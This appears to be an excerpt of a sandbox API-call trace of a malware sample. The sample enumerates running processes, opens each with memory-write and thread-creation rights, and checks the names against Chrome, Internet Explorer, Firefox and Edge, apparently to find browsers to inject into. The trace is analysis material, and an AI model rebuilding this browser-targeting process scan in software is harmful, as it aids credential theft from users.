	[0245.897] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.897] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0245.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.897] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.897] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0245.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x93e8
	[0245.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.898] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.898] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.899] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.899] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.899] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x93ec
	[0245.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.900] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.900] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.901] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.901] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.901] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x93f0
	[0245.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.902] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.902] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.903] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.903] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.904] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x93f4
	[0245.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.904] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.905] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.905] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.906] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.906] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x93f8
	[0245.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.907] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.907] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.907] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.908] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.908] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.909] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x93fc
	[0245.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.909] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.909] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.909] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.910] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.910] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.911] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x9400
	[0245.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.911] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.911] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.912] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.912] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.912] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.913] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9404
	[0245.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.913] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.913] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.914] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.914] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.914] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0245.915] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9408
	[0245.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.915] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0245.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.915] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.916] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0245.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.916] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.916] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.917] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x940c
	[0245.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.917] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.918] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.918] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.918] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.918] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0245.948] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9410
	[0245.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.948] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.949] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.949] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.949] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.950] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9414
	[0245.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.952] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0245.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.952] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.953] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0245.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.953] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9418
	[0245.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.955] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x941c
	[0245.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.956] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0245.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0245.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.958] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0245.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9420
	[0245.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.958] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0245.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.959] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.959] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0245.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.960] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0245.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9424
	[0245.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.961] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.961] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.961] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.962] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0245.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9428
	[0245.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.963] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0245.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.963] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.963] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0245.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.964] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0245.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0245.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0245.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x942c
	[0245.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.966] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0245.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.966] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.967] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0245.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.967] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0245.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9430
	[0245.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.969] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0245.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.969] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.969] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0245.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.970] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0245.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9434
	[0245.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.971] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0245.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.971] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.972] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0245.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.972] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0245.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9438
	[0245.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.973] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0245.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.973] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.974] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0245.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.974] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0245.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x943c
	[0245.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.975] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0245.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.976] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.976] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0245.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.977] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0245.978] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9440
	[0245.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.978] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0245.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.978] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.979] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0245.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.979] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0245.980] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9444
	[0245.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.980] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0245.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.980] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.981] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0245.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.984] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
